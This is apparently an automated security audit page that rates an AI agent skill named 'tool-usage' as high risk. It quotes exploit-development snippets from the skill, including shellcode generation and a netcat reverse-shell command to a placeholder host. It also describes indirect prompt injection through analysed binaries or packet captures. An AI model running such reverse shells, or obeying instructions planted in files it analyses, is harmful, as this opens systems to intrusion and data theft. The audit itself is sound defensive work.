skills/smithery/ai/tool-usage/Gen Agent Trust Hub

tool-usage

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Categories: COMMAND_EXECUTION, DATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (MEDIUM): The documentation includes instructions for spawning local processes, attaching debuggers, and generating shellcode (e.g., process('./target'), gdb.attach(p), shellcraft.sh()). These patterns are standard for security research but constitute a high-privilege execution surface if an attacker can influence the inputs to these commands.
  • [DATA_EXFILTRATION] (MEDIUM): The skill documents methods for creating reverse shells and network connections (e.g., remote('host', port), nc -e /bin/sh host 4444, shellcraft.connect()). If the agent handles untrusted data that gets interpolated into these command templates, it could be coerced into exfiltrating local data to a remote listener.
  • [INDIRECT_PROMPT_INJECTION] (MEDIUM): The skill provides tools for analyzing external files and network traffic (Ghidra, tcpdump, pwntools). This creates an attack surface (Category 8) where malicious content within a target binary or packet capture could contain instructions intended to exploit the agent's logic during analysis.
  • [SAFE_LISTING] (LOW): The automated scanner flagged 'libc.so' as malicious. In the context of this skill, 'libc.so' is a standard reference to the C standard library used for exploit development (Return-to-libc attacks) and is not a malicious URL or payload in itself.
Recommendations
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 06:21 AM